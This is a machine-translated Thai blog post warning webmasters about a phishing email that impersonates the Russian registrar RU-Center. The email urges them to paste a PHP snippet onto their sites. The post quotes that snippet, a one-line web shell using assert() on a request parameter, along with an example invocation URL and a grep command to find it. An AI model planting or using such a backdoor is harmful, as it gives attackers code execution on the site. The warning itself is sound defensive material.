ให้ความสนใจกับ "เว็บมาสเตอร์" ที่ไม่รู้จัก PHP ช่องโหว่
นี่เป็นคำแปลอัตโนมัติ
คลิกที่นี่เพื่ออ่านสิ่งตีพิมพ์ในภาษาต้นฉบับ
วันนี้ เพื่อนของฉันบางคนได้รับจดหมายซึ่งอ้างว่ามาจาก RU-Center (บริษัทจดทะเบียนชื่อโดเมนรัสเซียที่ใหญ่ที่สุด) — nic.ru โดยมีเนื้อหาดังต่อไปนี้:
จดหมายถูกส่งมาจาก [email protected] ในจดหมาย ผู้โจมตีซึ่งแสดงตนในนามของ RU-Center แนะนำให้วางรหัสต่อไปนี้บนเว็บไซต์:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>
น่าเสียดายที่เพื่อนร่วมงานของเราหลายคนที่เรียกตัวเองว่า "ผู้ดูแลเว็บ" (เจ้าของไซต์จำนวนมาก) ไม่รู้จัก PHP และไม่คิดถึงอันตรายของโค้ดด้านบน หากคุณส่งสตริงเป็นพารามิเตอร์ให้กับฟังก์ชันนี้ สตริงจะถูกพิจารณาโดยยืนยัน () เป็นโค้ด PHP! ระวัง!
ฉันแนะนำให้คุณตรวจสอบโครงการ php ของคุณเพื่อหาช่องโหว่โดยใช้คำสั่งยืนยันหรือ eval หากคำสั่งเหล่านี้มีอยู่ในรหัสโครงการ อย่าตื่นตระหนก — ศึกษาอัลกอริทึม การใช้อัลกอริธึมที่ได้รับอนุญาตนั้นค่อนข้างเป็นไปได้ ในกรณีของตัวอย่างข้างต้น คำสั่งจะอนุญาตให้ผู้โจมตีโทรหาไซต์ของคุณได้ เช่น การใช้พารามิเตอร์ RUCENTER — http://sistema-audit.ru/?RUCENTER=PHP-code
เราขอแนะนำให้คุณทำการค้นหาโดยใช้คำสั่ง linux grep —i —r 'assert' / home / www / mysite / * ระบุโฟลเดอร์ที่มีไฟล์ของไซต์ เพื่อรับรายการไฟล์ที่น่าสงสัย อินสแตนซ์คือรหัสที่ใช้
ดูแลตัวเองและเว็บไซต์ของคุณ!
นี่เป็นคำแปลอัตโนมัติ
คลิกที่นี่เพื่ออ่านสิ่งตีพิมพ์ในภาษาต้นฉบับ